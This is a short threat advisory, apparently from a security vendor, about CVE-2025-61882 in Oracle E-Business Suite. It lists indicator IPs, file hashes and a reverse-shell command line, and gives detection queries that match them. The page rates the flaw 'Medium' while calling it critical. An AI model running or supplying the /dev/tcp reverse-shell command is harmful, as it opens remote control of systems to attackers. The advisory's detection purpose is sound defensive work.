Oracle Security Alert Advisory - CVE-2025-61882

    Tuesday, October 7, 2025 In: Threat Research Print

    Date: 10/07/2025

    Severity: Medium

    Summary

    CVE-2025-61882 is a critical remote code execution vulnerability in Oracle E-Business Suite that can be exploited without authentication. Oracle urges users to apply the latest patches immediately, ensuring the October 2023 Critical Patch Update is already in place.

    Indicators of Compromise (IOC) List

    IP Address

    200.107.207.26

    185.181.60.11

    Hash : 

    76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d

    aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121

    6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

    Command

    sh -c /bin/bash -i >& /dev/tcp// 0>&1

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    dstipaddress IN ("200.107.207.26","185.181.60.11") or srcipaddress IN ("200.107.207.26","185.181.60.11")

    Detection Query 2 :

    sha256hash IN ("76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d","aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121","6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b")

    Detection Query 3 :

    resourcename = "Windows Security" AND commandline like "sh -c /bin/bash -i >& /dev/tcp// 0>&1"

    Detection Query 4 :

    technologygroup = "EDR" AND commandline like "sh -c /bin/bash -i >& /dev/tcp// 0>&1"
     

    Reference:    

    https://www.oracle.com/security-alerts/alert-cve-2025-61882.html


    Tags

    VulnerabilityCVE-2025OracleExploit

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.